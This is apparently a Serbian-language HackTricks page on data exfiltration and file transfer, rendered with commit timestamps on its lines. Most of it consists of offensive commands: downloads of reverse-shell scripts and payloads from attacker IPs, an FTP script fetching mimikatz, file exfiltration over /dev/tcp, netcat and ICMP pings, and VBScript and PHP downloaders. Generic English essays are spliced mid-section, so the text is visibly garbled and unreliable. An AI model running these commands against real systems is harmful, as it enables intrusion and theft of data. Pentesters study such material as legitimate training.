2024-02-10 13:11:20 +00:00
# Izfiltracija
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 13:11:20 +00:00
< summary > < strong > Naučite hakovanje AWS-a od nule do heroja sa< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-03-09 13:32:43 +00:00
Drugi načini podrške HackTricks-u:
2023-12-30 20:49:23 +00:00
2024-03-09 13:32:43 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJE** ](https://github.com/sponsors/carlospolop )!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-03-09 13:32:43 +00:00
* Otkrijte [**Porodicu PEASS** ](https://opensea.io/collection/the-peass-family ), našu kolekciju ekskluzivnih [**NFT-ova** ](https://opensea.io/collection/the-peass-family )
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2024-02-10 13:11:20 +00:00
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-09 13:32:43 +00:00
## Često beleženi domeni za izfiltraciju informacija
2023-09-02 23:48:41 +00:00
2024-03-09 13:32:43 +00:00
Proverite [https://lots-project.com/ ](https://lots-project.com/ ) da biste pronašli često beležene domene koji mogu biti zloupotrebljeni
2022-04-28 16:01:33 +00:00
2024-03-09 13:32:43 +00:00
## Kopiranje\&lepljenje Base64
2020-07-15 15:43:14 +00:00
2022-07-21 20:01:55 +00:00
**Linux**
2020-07-15 15:43:14 +00:00
```bash
base64 -w0 < file > #Encode file
base64 -d file #Decode file
```
2022-07-21 20:01:55 +00:00
**Windows**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
2024-03-09 13:32:43 +00:00
## HTTP
2020-07-15 15:43:14 +00:00
2022-07-21 20:01:55 +00:00
**Linux**
2020-07-15 15:43:14 +00:00
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
2022-07-21 20:01:55 +00:00
**Windows**
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2024-03-09 13:32:43 +00:00
### Postavljanje fajlova
2020-07-15 15:43:14 +00:00
2023-03-28 10:15:00 +00:00
* [**SimpleHttpServerWithFileUploads** ](https://gist.github.com/UniIsland/3346170 )
2024-03-09 13:32:43 +00:00
* [**SimpleHttpServer printing GET and POSTs (also headers)** ](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149 )
2024-02-10 13:11:20 +00:00
* Python modul [uploadserver ](https://pypi.org/project/uploadserver/ ):
2023-03-15 12:03:23 +00:00
```bash
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
2024-02-10 13:11:20 +00:00
# With basic auth:
2023-03-15 12:03:23 +00:00
# python3 -m uploadserver --basic-auth hello:world
2020-07-15 15:43:14 +00:00
2023-03-15 12:03:23 +00:00
# Send a file
2024-02-10 13:11:20 +00:00
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
2023-03-15 12:03:23 +00:00
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
```
2024-02-10 13:11:20 +00:00
### **HTTPS Server**
2021-09-07 12:22:24 +00:00
```python
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
2021-09-07 13:32:20 +00:00
# https://localhost:443
2021-09-07 12:22:24 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON 2
2021-09-07 12:22:24 +00:00
import BaseHTTPServer, SimpleHTTPServer
import ssl
2021-09-07 13:32:20 +00:00
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
2021-09-07 12:22:24 +00:00
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON3
2022-02-02 14:59:07 +00:00
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### USING FLASK
2022-02-02 14:59:07 +00:00
from flask import Flask, redirect, request
from urllib.parse import quote
2024-02-10 13:11:20 +00:00
app = Flask(__name__)
@app .route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
2022-05-01 12:41:36 +00:00
###
2021-09-07 12:22:24 +00:00
```
2024-02-10 13:11:20 +00:00
## FTP
### FTP server (python)
2020-07-15 15:43:14 +00:00
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
2024-02-10 13:11:20 +00:00
### FTP server (NodeJS)
2020-07-15 15:43:14 +00:00
2023-03-15 12:03:23 +00:00
### FTP server (NodeJS)
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
2023-03-15 12:03:23 +00:00
### FTP server (pure-ftp)
2020-07-15 15:43:14 +00:00
```bash
apt-get update & & apt-get install pure-ftp
```
```bash
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
2024-02-10 13:11:20 +00:00
### **Windows** klijent
2020-07-15 15:43:14 +00:00
```bash
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
2023-03-15 12:03:23 +00:00
## SMB
2020-07-15 15:43:14 +00:00
2024-02-10 13:11:20 +00:00
Kali kao server
2020-07-15 15:43:14 +00:00
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
2024-03-09 13:32:43 +00:00
Ili kreirajte smb deljenje **koristeći sambu** :
2020-07-15 15:43:14 +00:00
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
2024-02-10 13:11:20 +00:00
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
2020-07-15 15:43:14 +00:00
#Start samba
service smbd restart
```
2024-03-09 13:32:43 +00:00
Windows
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
---
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
### Exfiltration
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
#### Overview
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Exfiltration is the unauthorized transfer of data from a target system. Once an attacker has successfully gained access to a system, exfiltration is often the next step in the attack process. There are various methods that can be used to exfiltrate data from a compromised system, including:
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
- **Email**: Sending data as email attachments to an external email account.
- **FTP**: Transferring data using the File Transfer Protocol to an external server.
- **DNS**: Sending data using DNS queries to a controlled domain.
- **Web**: Uploading data to a web server controlled by the attacker.
- **Cloud Storage**: Storing data in cloud storage services such as Dropbox or Google Drive.
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
#### Techniques
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
Exfiltration techniques can vary depending on the attacker's goals and the target environment. Some common exfiltration techniques include:
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
- **Compression**: Compressing data before exfiltration to reduce file size and avoid detection.
- **Encryption**: Encrypting data to prevent unauthorized access during transit.
- **Steganography**: Hiding data within other files or images to evade detection.
- **Data Fragmentation**: Splitting data into smaller fragments for exfiltration to avoid detection.
- **Traffic Obfuscation**: Modifying network traffic patterns to blend in with normal traffic.
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
#### Tools and Resources
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
There are several tools and resources available to assist with data exfiltration, including:
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
- **Netcat**: A versatile networking utility that can be used for data transfer.
- **Curl**: A command-line tool for transferring data with various protocols.
- **Wget**: Another command-line tool for downloading files from the web.
- **Cloud Storage APIs**: APIs provided by cloud storage services for programmatic access.
- **Custom Scripts**: Tailored scripts developed by attackers for specific exfiltration needs.
By understanding exfiltration techniques and utilizing appropriate tools, attackers can effectively steal data from target systems without being detected.
2020-07-15 15:43:14 +00:00
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
2023-03-15 12:03:23 +00:00
## SCP
2020-07-15 15:43:14 +00:00
2024-02-10 13:11:20 +00:00
Napadač mora imati pokrenut SSHd.
2020-07-15 15:43:14 +00:00
```bash
2024-02-10 13:11:20 +00:00
scp < username > @< Attacker_IP > :< directory > /< filename >
2020-07-15 15:43:14 +00:00
```
2023-03-15 12:03:23 +00:00
## SSHFS
2022-07-06 10:22:29 +00:00
2024-03-09 13:32:43 +00:00
Ako žrtva ima SSH, napadač može montirati direktorijum sa žrtve na napadača.
2022-07-06 10:22:29 +00:00
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions < Target username > @< Target IP address > :< Full path to folder > / /mnt/sshfs/
```
2023-03-15 12:03:23 +00:00
## NC
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Netcat (NC) je moćan alat za mrežno testiranje i komunikaciju. Može se koristiti za prenos podataka između sistema putem TCP ili UDP veza. NC može biti korišćen za uspostavljanje reverse shell-a, preuzimanje fajlova, skeniranje portova i još mnogo toga.
2020-07-15 15:43:14 +00:00
```bash
nc -lvnp 4444 > new_file
nc -vn < IP > 4444 < exfil_file
```
2024-03-09 13:32:43 +00:00
## /dev/tcp
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
### Preuzimanje fajla sa žrtve
2020-07-15 15:43:14 +00:00
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
2024-03-09 13:32:43 +00:00
### Postavljanje datoteke žrtvi
2020-07-15 15:43:14 +00:00
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat < & 6 > file.txt
```
2024-03-09 13:32:43 +00:00
Zahvaljujući ** @BinaryShadow \_**
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
## **ICMP**
2020-07-15 15:43:14 +00:00
```bash
2022-09-13 11:57:23 +00:00
# To exfiltrate the content of a file via pings you can do:
2020-07-15 15:43:14 +00:00
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line < IP attacker > ; done
2021-10-30 12:23:41 +00:00
#This will 4bytes per ping packet (you could probably increase this until 16)
2020-07-15 15:43:14 +00:00
```
```python
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
2024-02-10 13:11:20 +00:00
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
2020-07-15 15:43:14 +00:00
sniff(iface="tun0", prn=process_packet)
```
2023-03-15 12:03:23 +00:00
## **SMTP**
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Ako možete poslati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a:
2020-07-15 15:43:14 +00:00
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
2023-03-15 12:03:23 +00:00
## TFTP
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Podrazumevano u XP i 2003 (u drugima mora biti eksplicitno dodato tokom instalacije)
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Na Kali, **pokrenite TFTP server** :
2020-07-15 15:43:14 +00:00
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
2024-02-10 13:11:20 +00:00
**TFTP server u Pythonu:**
2020-07-15 15:43:14 +00:00
```bash
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p < PORT > < IFACE > < FOLDER >
```
2024-03-09 13:32:43 +00:00
Na **žrtvu** , povežite se sa Kali serverom:
2020-07-15 15:43:14 +00:00
```bash
tftp -i < KALI-IP > get nc.exe
```
2023-03-15 12:03:23 +00:00
## PHP
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Preuzmite fajl pomoću PHP jednolinijske komande:
2020-07-15 15:43:14 +00:00
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?> " > down2.php
```
2023-03-15 12:03:23 +00:00
## VBScript
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
---
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
### Introduction
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
VBScript is a scripting language that is often used by attackers to execute malicious code on Windows systems. It is commonly used in phishing attacks and can be used to exfiltrate data from a compromised system.
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
### Exfiltration Techniques
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
#### 1. Writing to Files
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
VBScript can be used to write data to files on the compromised system. Attackers can write sensitive information to a file and then exfiltrate it later.
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
#### 2. Sending Emails
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
VBScript can also be used to send emails with attachments containing exfiltrated data. Attackers can use this technique to bypass network defenses and exfiltrate data to an external server.
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
#### 3. Using FTP
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
VBScript can leverage FTP (File Transfer Protocol) to exfiltrate data to an external server. Attackers can write scripts to automate the FTP transfer process and exfiltrate data without being detected.
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
### Detection and Prevention
2024-02-10 13:11:20 +00:00
2024-03-09 13:32:43 +00:00
Detecting VBScript exfiltration techniques can be challenging, as VBScript is a legitimate scripting language used by system administrators. However, monitoring for suspicious file write operations, network traffic to unknown destinations, and unusual email activity can help in detecting and preventing data exfiltration using VBScript.
2024-02-10 13:11:20 +00:00
```bash
Attacker> python -m SimpleHTTPServer 80
```
**Žrtva**
2020-07-15 15:43:14 +00:00
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
```bash
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
2023-03-15 12:03:23 +00:00
## Debug.exe
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:43 +00:00
Program `debug.exe` ne samo što omogućava inspekciju binarnih fajlova već takođe ima **mogućnost da ih rekonstruiše iz heksadecimalnog koda** . To znači da, pružajući heksadecimalni kod binarnog fajla, `debug.exe` može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima **ograničenje u sastavljanju fajlova do 64 kb veličine** .
2024-02-07 04:06:18 +00:00
```bash
# Reduce the size
2020-07-15 15:43:14 +00:00
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
2024-03-09 13:32:43 +00:00
Zatim kopirajte i nalepite tekst u prozor komandne linije i biće kreiran fajl nazvan nc.exe.
2024-02-07 04:06:18 +00:00
* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html ](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html )
2020-07-15 15:43:14 +00:00
2023-03-15 12:03:23 +00:00
## DNS
2021-04-01 12:07:45 +00:00
2022-06-28 10:36:33 +00:00
* [https://github.com/62726164/dns-exfil ](https://github.com/62726164/dns-exfil )
2022-04-28 16:01:33 +00:00
< details >
2024-03-09 13:32:43 +00:00
< summary > < strong > Naučite hakovanje AWS-a od nule do heroja sa< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2023-12-30 20:49:23 +00:00
2024-03-09 13:32:43 +00:00
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU** ](https://github.com/sponsors/carlospolop )!
* Nabavite [**zvanični PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-02-10 13:11:20 +00:00
* Otkrijte [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), našu kolekciju ekskluzivnih [**NFT-ova** ](https://opensea.io/collection/the-peass-family )
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2024-03-09 13:32:43 +00:00
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2022-04-28 16:01:33 +00:00
< / details >